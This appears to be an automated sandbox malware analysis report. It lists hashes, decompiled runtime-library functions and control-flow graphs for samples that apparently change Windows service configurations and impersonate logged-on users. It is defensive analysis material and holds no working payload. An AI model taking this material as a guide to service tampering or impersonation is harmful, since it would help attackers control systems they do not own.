                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_1fc0000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __fileno__flsbuf__flush__getptd_noexit__locking
                                                          • String ID:
                                                          • API String ID: 1291973410-0
                                                          • Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                          • Instruction ID: 464b393105b6345609bc9399581d4a4af2b552dc98ae927bfde97bdddda0132b
                                                          • Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                          • Instruction Fuzzy Hash: 1341F535E0060BEBDB148F69CA9259EBBB6EF80FA0F24852DD51597140D732D940AF41
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.414584298.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_1fc0000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _fseek_malloc_memset
                                                          • String ID:
                                                          • API String ID: 208892515-0
                                                          • Opcode ID: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
                                                          • Instruction ID: f7f0d3428ef89c077805173facaf11e11f254fa3aacd29ab8c5edf76c88a4ba3
                                                          • Opcode Fuzzy Hash: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
                                                          • Instruction Fuzzy Hash: E941C672A48B138AD730862D9F0071776F59F90A74F140A1DE6DAD2790E733E445E741
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E0041529F(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                          				char _v8;
                                                          				signed int _v12;
                                                          				char _v20;
                                                          				char _t43;
                                                          				char _t46;
                                                          				signed int _t53;
                                                          				signed int _t54;
                                                          				intOrPtr _t56;
                                                          				int _t57;
                                                          				int _t58;
                                                          				signed short* _t59;
                                                          				short* _t60;
                                                          				int _t65;
                                                          				char* _t72;
                                                          
                                                          				_t72 = _a8;
                                                          				if(_t72 == 0 || _a12 == 0) {
                                                          					L5:
                                                          					return 0;
                                                          				} else {
                                                          					if( *_t72 != 0) {
                                                          						E0040EC86( &_v20, _a16);
                                                          						_t43 = _v20;
                                                          						__eflags =  *(_t43 + 0x14);
                                                          						if( *(_t43 + 0x14) != 0) {
                                                          							_t46 = E004153D0( *_t72 & 0x000000ff,  &_v20);
                                                          							__eflags = _t46;
                                                          							if(_t46 == 0) {
                                                          								__eflags = _a4;
                                                          								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
                                                          								if(__eflags != 0) {
                                                          									L10:
                                                          									__eflags = _v8;
                                                          									if(_v8 != 0) {
                                                          										_t53 = _v12;
                                                          										_t11 = _t53 + 0x70;
                                                          										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
                                                          										__eflags =  *_t11;
                                                          									}
                                                          									return 1;
                                                          								}
                                                          								L21:
                                                          								_t54 = E0040BFC1(__eflags);
                                                          								 *_t54 = 0x2a;
                                                          								__eflags = _v8;
                                                          								if(_v8 != 0) {
                                                          									_t54 = _v12;
                                                          									_t33 = _t54 + 0x70;
                                                          									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
                                                          									__eflags =  *_t33;
                                                          								}
                                                          								return _t54 | 0xffffffff;
                                                          							}
                                                          							_t56 = _v20;
                                                          							_t65 =  *(_t56 + 0xac);
                                                          							__eflags = _t65 - 1;
                                                          							if(_t65 <= 1) {
                                                          								L17:
                                                          								__eflags = _a12 -  *(_t56 + 0xac);
                                                          								if(__eflags < 0) {
                                                          									goto L21;
                                                          								}
                                                          								__eflags = _t72[1];
                                                          								if(__eflags == 0) {
                                                          									goto L21;
                                                          								}
                                                          								L19:
                                                          								_t57 =  *(_t56 + 0xac);
                                                          								__eflags = _v8;
                                                          								if(_v8 == 0) {
                                                          									return _t57;
                                                          								}
                                                          								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
                                                          								return _t57;
                                                          							}
                                                          							__eflags = _a12 - _t65;
                                                          							if(_a12 < _t65) {
                                                          								goto L17;
                                                          							}
                                                          							__eflags = _a4;
                                                          							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
                                                          							__eflags = _t58;
                                                          							_t56 = _v20;
                                                          							if(_t58 != 0) {
                                                          								goto L19;
                                                          							}
                                                          							goto L17;
                                                          						}
                                                          						_t59 = _a4;
                                                          						__eflags = _t59;
                                                          						if(_t59 != 0) {
                                                          							 *_t59 =  *_t72 & 0x000000ff;
                                                          						}
                                                          						goto L10;
                                                          					} else {
                                                          						_t60 = _a4;
                                                          						if(_t60 != 0) {
                                                          							 *_t60 = 0;
                                                          						}
                                                          						goto L5;
                                                          					}
                                                          				}
                                                          			}


















                                                          APIs
                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
                                                          • __isleadbyte_l.LIBCMT ref: 00415307
                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.413978160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.413978160.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000002.00000002.413978160.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                          • String ID:
                                                          • API String ID: 3058430110-0
                                                          • Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                          • Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
                                                          • Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                          • Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 01FD553A
                                                          • __isleadbyte_l.LIBCMT ref: 01FD556E
                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 01FD559F
                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 01FD560D
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.414584298.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_1fc0000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                          • String ID:
                                                          • API String ID: 3058430110-0
                                                          • Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                          • Instruction ID: 3d5a46b13f73afe8716d6c18539e01b93c3ca0b3da3816334ac2bb9cac90411c
                                                          • Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                          • Instruction Fuzzy Hash: D331B131A10246EFEB22DF68C880BBE3FB7AF41215B9C4569E565CB1B1E732D940DB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E004134DB(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                          				intOrPtr _t25;
                                                          				void* _t26;
                                                          				void* _t28;
                                                          
                                                          				_t25 = _a16;
                                                          				if(_t25 == 0x65 || _t25 == 0x45) {
                                                          					_t26 = E00412DCC(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                          					goto L9;
                                                          				} else {
                                                          					_t34 = _t25 - 0x66;
                                                          					if(_t25 != 0x66) {
                                                          						__eflags = _t25 - 0x61;
                                                          						if(_t25 == 0x61) {
                                                          							L7:
                                                          							_t26 = E00412EBC(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
                                                          						} else {
                                                          							__eflags = _t25 - 0x41;
                                                          							if(__eflags == 0) {
                                                          								goto L7;
                                                          							} else {
                                                          								_t26 = E004133E1(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                          							}
                                                          						}
                                                          						L9:
                                                          						return _t26;
                                                          					} else {
                                                          						return E00413326(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
                                                          					}
                                                          				}
                                                          			}







                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.413978160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.413978160.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000002.00000002.413978160.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                          • String ID:
                                                          • API String ID: 3016257755-0
                                                          • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                          • Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
                                                          • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                          • Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.414584298.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_1fc0000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                          • String ID:
                                                          • API String ID: 3016257755-0
                                                          • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                          • Instruction ID: 67c3a6b89fe31dd52e740921048ca5d8080046b149df682d46f967dd7992004a
                                                          • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                          • Instruction Fuzzy Hash: A21148B240454AFBCF125E89CC45CEE3F67BB18254B4A8515FB2859130E237C9B1AB82
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Execution Graph

                                                          Execution Coverage:51%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:9.4%
                                                          Total number of Nodes:32
                                                          Total number of Limit Nodes:2

                                                          Callgraph

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.442830907.00007FF9A7930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A7930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff9a7930000_nika.jbxd
                                                          Similarity
                                                          • API ID: NameUser
                                                          • String ID:
                                                          • API String ID: 2645101109-0
                                                          • Opcode ID: 8ba8f8a90636b61cc49ca103cc1e88f6881706b7a8cfd4710523ed54392684f3
                                                          • Instruction ID: eec6579fbb36b79c797f2c171ddd045b29b887274024a064feea452c5ab0d7d5
                                                          • Opcode Fuzzy Hash: 8ba8f8a90636b61cc49ca103cc1e88f6881706b7a8cfd4710523ed54392684f3
                                                          • Instruction Fuzzy Hash: 0C918330618A4D8FEB68DF28D8967E977E1FF59310F00812ED84EC7291CB75A545CB92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 17 7ff9a7931b10-7ff9a7931b17 18 7ff9a7931b19-7ff9a7931b21 17->18 19 7ff9a7931b22-7ff9a7931bd8 17->19 18->19 23 7ff9a7931bda-7ff9a7931be9 19->23 24 7ff9a7931c36-7ff9a7931c68 19->24 23->24 25 7ff9a7931beb-7ff9a7931bee 23->25 31 7ff9a7931c6a-7ff9a7931c7a 24->31 32 7ff9a7931cc7-7ff9a7931d00 24->32 26 7ff9a7931bf0-7ff9a7931c03 25->26 27 7ff9a7931c28-7ff9a7931c30 25->27 29 7ff9a7931c07-7ff9a7931c1a 26->29 30 7ff9a7931c05 26->30 27->24 29->29 33 7ff9a7931c1c-7ff9a7931c24 29->33 30->29 31->32 34 7ff9a7931c7c-7ff9a7931c7f 31->34 38 7ff9a7931d5e-7ff9a7931d97 32->38 39 7ff9a7931d02-7ff9a7931d11 32->39 33->27 36 7ff9a7931cb9-7ff9a7931cc1 34->36 37 7ff9a7931c81-7ff9a7931c94 34->37 36->32 40 7ff9a7931c98-7ff9a7931cab 37->40 41 7ff9a7931c96 37->41 49 7ff9a7931d99-7ff9a7931da9 38->49 50 7ff9a7931df6-7ff9a7931e2f 38->50 39->38 42 7ff9a7931d13-7ff9a7931d16 39->42 40->40 43 7ff9a7931cad-7ff9a7931cb5 40->43 41->40 44 7ff9a7931d50-7ff9a7931d58 42->44 45 7ff9a7931d18-7ff9a7931d2b 42->45 43->36 44->38 47 7ff9a7931d2f-7ff9a7931d42 45->47 48 7ff9a7931d2d 45->48 47->47 51 7ff9a7931d44-7ff9a7931d4c 47->51 48->47 49->50 52 7ff9a7931dab-7ff9a7931dae 49->52 58 7ff9a7931e8e-7ff9a7931ec7 50->58 59 7ff9a7931e31-7ff9a7931e41 50->59 51->44 53 7ff9a7931db0-7ff9a7931dc3 52->53 54 7ff9a7931de8-7ff9a7931df0 52->54 56 7ff9a7931dc7-7ff9a7931dda 53->56 57 7ff9a7931dc5 53->57 54->50 56->56 60 7ff9a7931ddc-7ff9a7931de4 56->60 57->56 65 7ff9a7931ec9-7ff9a7931ed9 58->65 66 7ff9a7931f26-7ff9a7931fe2 ChangeServiceConfigA 58->66 59->58 61 7ff9a7931e43-7ff9a7931e46 59->61 60->54 63 7ff9a7931e80-7ff9a7931e88 61->63 64 7ff9a7931e48-7ff9a7931e5b 61->64 63->58 67 7ff9a7931e5f-7ff9a7931e72 64->67 68 7ff9a7931e5d 64->68 65->66 69 7ff9a7931edb-7ff9a7931ede 65->69 76 7ff9a7931fea-7ff9a7931ffc call 7ff9a7932049 66->76 77 7ff9a7931fe4 66->77 67->67 70 7ff9a7931e74-7ff9a7931e7c 67->70 68->67 71 7ff9a7931ee0-7ff9a7931ef3 69->71 72 
7ff9a7931f18-7ff9a7931f20 69->72 70->63 74 7ff9a7931ef7-7ff9a7931f0a 71->74 75 7ff9a7931ef5 71->75 72->66 74->74 78 7ff9a7931f0c-7ff9a7931f14 74->78 75->74 80 7ff9a7932001-7ff9a7932048 76->80 77->76 78->72
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.442830907.00007FF9A7930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A7930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff9a7930000_nika.jbxd
                                                          Similarity
                                                          • API ID: ChangeConfigService
                                                          • String ID:
                                                          • API String ID: 3849694230-0
                                                          • Opcode ID: 4297f51b53212a0ca5520eb7991db2334747a913117e31b369c22962d773a8a3
                                                          • Instruction ID: 23e00aa7ce553c015cceb36d8c9113a51cd733b51c9785730a3f002b95709590
                                                          • Opcode Fuzzy Hash: 4297f51b53212a0ca5520eb7991db2334747a913117e31b369c22962d773a8a3
                                                          • Instruction Fuzzy Hash: 87F18130918E4E4BEB68DF28D8477F977D1FB59310F10426EE89EC7291DB74A5818B82
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 114 7ff9a7930c34-7ff9a7930c3b 115 7ff9a7930c3d-7ff9a7930c45 114->115 116 7ff9a7930c46-7ff9a7930ce5 114->116 115->116 120 7ff9a7930d40-7ff9a7930daa OpenServiceA 116->120 121 7ff9a7930ce7-7ff9a7930cf6 116->121 128 7ff9a7930dac 120->128 129 7ff9a7930db2-7ff9a7930e01 call 7ff9a7930e02 120->129 121->120 122 7ff9a7930cf8-7ff9a7930cfb 121->122 123 7ff9a7930cfd-7ff9a7930d10 122->123 124 7ff9a7930d35-7ff9a7930d3d 122->124 126 7ff9a7930d14-7ff9a7930d27 123->126 127 7ff9a7930d12 123->127 124->120 126->126 131 7ff9a7930d29-7ff9a7930d31 126->131 127->126 128->129 131->124
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.442830907.00007FF9A7930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A7930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff9a7930000_nika.jbxd
                                                          Similarity
                                                          • API ID: OpenService
                                                          • String ID:
                                                          • API String ID: 3098006287-0
                                                          • Opcode ID: 5a7edfe3b2d329facd973b8de39b5dab7d5cf723b5ed58cef1dff195b6f24ed3
                                                          • Instruction ID: 9750408e3842ae0acf3e0994fbe53cfd34783e282cbc8a29a2acd833e68d35af
                                                          • Opcode Fuzzy Hash: 5a7edfe3b2d329facd973b8de39b5dab7d5cf723b5ed58cef1dff195b6f24ed3
                                                          • Instruction Fuzzy Hash: D8519430518A4D4FEB58EF2CD8567E977E1FB59310F10422EE89EC3292DB74E8418B92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 134 7ff9a7930b2d-7ff9a7930bb8 139 7ff9a7930bba-7ff9a7930bbf 134->139 140 7ff9a7930bc2-7ff9a7930bc7 134->140 139->140 141 7ff9a7930bc9-7ff9a7930bce 140->141 142 7ff9a7930bd1-7ff9a7930c08 OpenSCManagerW 140->142 141->142 143 7ff9a7930c0a 142->143 144 7ff9a7930c10-7ff9a7930c2d 142->144 143->144
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.442830907.00007FF9A7930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A7930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff9a7930000_nika.jbxd
                                                          Similarity
                                                          • API ID: ManagerOpen
                                                          • String ID:
                                                          • API String ID: 1889721586-0
                                                          • Opcode ID: 7c0cff6b2761b17cef5bcba566fa3f9db8269b4a5b552e9697c61edd32cf2776
                                                          • Instruction ID: e24f7de1b57dd4186b8d00f91a6b2a594d2f0adf15ff51cbf92a9a0839b794ab
                                                          • Opcode Fuzzy Hash: 7c0cff6b2761b17cef5bcba566fa3f9db8269b4a5b552e9697c61edd32cf2776
                                                          • Instruction Fuzzy Hash: 6F31903190DA588FDB28DF9C984A7FABBF1EB65311F00416FD08ED3652CA7064458B91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 145 7ff9a7931a1d-7ff9a7931a25 146 7ff9a7931a27 145->146 147 7ff9a7931a28-7ff9a7931ad9 ControlService 145->147 146->147 151 7ff9a7931adb 147->151 152 7ff9a7931ae1-7ff9a7931b09 147->152 151->152
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.442830907.00007FF9A7930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A7930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff9a7930000_nika.jbxd
                                                          Similarity
                                                          • API ID: ControlService
                                                          • String ID:
                                                          • API String ID: 253159669-0
                                                          • Opcode ID: 3ac947d5817dfa0f7827f7aa03df02ed8f2838772595e49d25895c9180769122
                                                          • Instruction ID: 85b334fe72e00f4761d8ca6c3ebda02736845073e8dd1285b0a1e1bffef2b473
                                                          • Opcode Fuzzy Hash: 3ac947d5817dfa0f7827f7aa03df02ed8f2838772595e49d25895c9180769122
                                                          • Instruction Fuzzy Hash: 4731C43190CA588FDB18DF9C9846AF97BF0EF65711F04416FE08AD3252CB74A846CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 153 7ff9a793108a-7ff9a79310b3 154 7ff9a79310be-7ff9a7931152 FindCloseChangeNotification 153->154 155 7ff9a79310b5-7ff9a79310bd 153->155 158 7ff9a793115a-7ff9a7931181 154->158 159 7ff9a7931154 154->159 155->154 159->158
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.442830907.00007FF9A7930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A7930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff9a7930000_nika.jbxd
                                                          Similarity
                                                          • API ID: ChangeCloseFindNotification
                                                          • String ID:
                                                          • API String ID: 2591292051-0
                                                          • Opcode ID: a138aa13b9b56cf9bb3108c83ad0dc18485a32de622eb9e358447c22b303c839
                                                          • Instruction ID: 532cb4cc4a7f25c5829ac744eb27d6ccd8890814863dc70dcb7dd2052e99eb8a
                                                          • Opcode Fuzzy Hash: a138aa13b9b56cf9bb3108c83ad0dc18485a32de622eb9e358447c22b303c839
                                                          • Instruction Fuzzy Hash: D831D63090D7885FDB0ADB6898157E97FF0EF57320F04429FD089C71A2DBA56456CB52
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 160 7ff9a7931760-7ff9a7931767 161 7ff9a7931769-7ff9a7931771 160->161 162 7ff9a7931772-7ff9a79317c5 160->162 161->162 165 7ff9a79317cd-7ff9a7931802 ImpersonateLoggedOnUser 162->165 166 7ff9a793180a-7ff9a7931831 165->166 167 7ff9a7931804 165->167 167->166
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.442830907.00007FF9A7930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A7930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff9a7930000_nika.jbxd
                                                          Similarity
                                                          • API ID: ImpersonateLoggedUser
                                                          • String ID:
                                                          • API String ID: 2216092060-0
                                                          • Opcode ID: 4d29ff7b72da00a2c6a6f33e0467aaea3310249e0e7267cf9948bc3944b57785
                                                          • Instruction ID: 153fbed3ac0307f06a07200e90bcfa310690d8f7d0889a5791ab18a00cf5736e
                                                          • Opcode Fuzzy Hash: 4d29ff7b72da00a2c6a6f33e0467aaea3310249e0e7267cf9948bc3944b57785
                                                          • Instruction Fuzzy Hash: CE31F63190CA4C8FDB58DF68D845BF97BE0EB56321F00422FD049C31A2CB74A856CB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 168 7ff9a7930108-7ff9a7930114 170 7ff9a793012b-7ff9a7931802 ImpersonateLoggedOnUser 168->170 171 7ff9a7930116 168->171 175 7ff9a793180a-7ff9a7931831 170->175 176 7ff9a7931804 170->176 171->170 176->175
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.442830907.00007FF9A7930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A7930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff9a7930000_nika.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7d3d8691a59116603c1586729954ce7bcad1815fa7e5436332f2a65a8d8ee548
                                                          • Instruction ID: 4e9d696c927cf9fd961306903d4266b6ec7cde34440493068d6de3b545feb727
                                                          • Opcode Fuzzy Hash: 7d3d8691a59116603c1586729954ce7bcad1815fa7e5436332f2a65a8d8ee548
                                                          • Instruction Fuzzy Hash: 5921E031A0CA0D8FDB48DF589806BF9BBE1EBA5321F00422FD04DC3192DB64A8068B91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 351 18a9a1-18a9ae call 18cfb2 354 18a9d0-18a9dc call 18a9e3 ExitProcess 351->354 355 18a9b0-18a9be GetPEB 351->355 355->354 357 18a9c0-18a9ca GetCurrentProcess TerminateProcess 355->357 357->354
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(0018E000,?,0018A9A0,0018AF26,?,0018E000,0018AF26,0018E000), ref: 0018A9C3
                                                          • TerminateProcess.KERNEL32(00000000,?,0018A9A0,0018AF26,?,0018E000,0018AF26,0018E000), ref: 0018A9CA
                                                          • ExitProcess.KERNEL32 ref: 0018A9DC
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$CurrentExitTerminate
                                                          • String ID:
                                                          • API String ID: 1703294689-0
                                                          • Opcode ID: 1b024833e7244657decd7ac09ecfebfa93916e056fe8f34cc67b30163edb5a73
                                                          • Instruction ID: 03be8be29561b91a70d64ce4001187aaa614732d7e304241bfe8c4afd989357c
                                                          • Opcode Fuzzy Hash: 1b024833e7244657decd7ac09ecfebfa93916e056fe8f34cc67b30163edb5a73
                                                          • Instruction Fuzzy Hash: 58E04631400108ABDB11BB14CC09A193BA9EF10341F454426F90586531CB39EEC1DFD2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SetUnhandledExceptionFilter.KERNELBASE(Function_00017A80,00187776), ref: 00187A79
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled
                                                          • String ID:
                                                          • API String ID: 3192549508-0
                                                          • Opcode ID: fe3e96edd6a6420ae8ea5edb4088e753725546aa623a77847e0a63063d70bc99
                                                          • Instruction ID: a8964a2ab33e06f386c7dee9809a4accc53a58c88bdb4f4ec732988a060f078f
                                                          • Opcode Fuzzy Hash: fe3e96edd6a6420ae8ea5edb4088e753725546aa623a77847e0a63063d70bc99
                                                          • Instruction Fuzzy Hash:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          APIs
                                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(001A9708,00000FA0,?,?,00187028), ref: 00187056
                                                          • GetModuleHandleW.KERNELBASE(api-ms-win-core-synch-l1-2-0.dll,?,?,00187028), ref: 00187061
                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00187028), ref: 00187072
                                                          • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00187084
                                                          • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00187092
                                                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00187028), ref: 001870B5
                                                          • ___scrt_fastfail.LIBCMT ref: 001870C6
                                                          • DeleteCriticalSection.KERNEL32(001A9708,00000007,?,?,00187028), ref: 001870D1
                                                          • CloseHandle.KERNEL32(00000000,?,?,00187028), ref: 001870E1
                                                          Strings
                                                          • WakeAllConditionVariable, xrefs: 0018708A
                                                          • api-ms-win-core-synch-l1-2-0.dll, xrefs: 0018705C
                                                          • kernel32.dll, xrefs: 0018706D
                                                          • SleepConditionVariableCS, xrefs: 0018707E
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
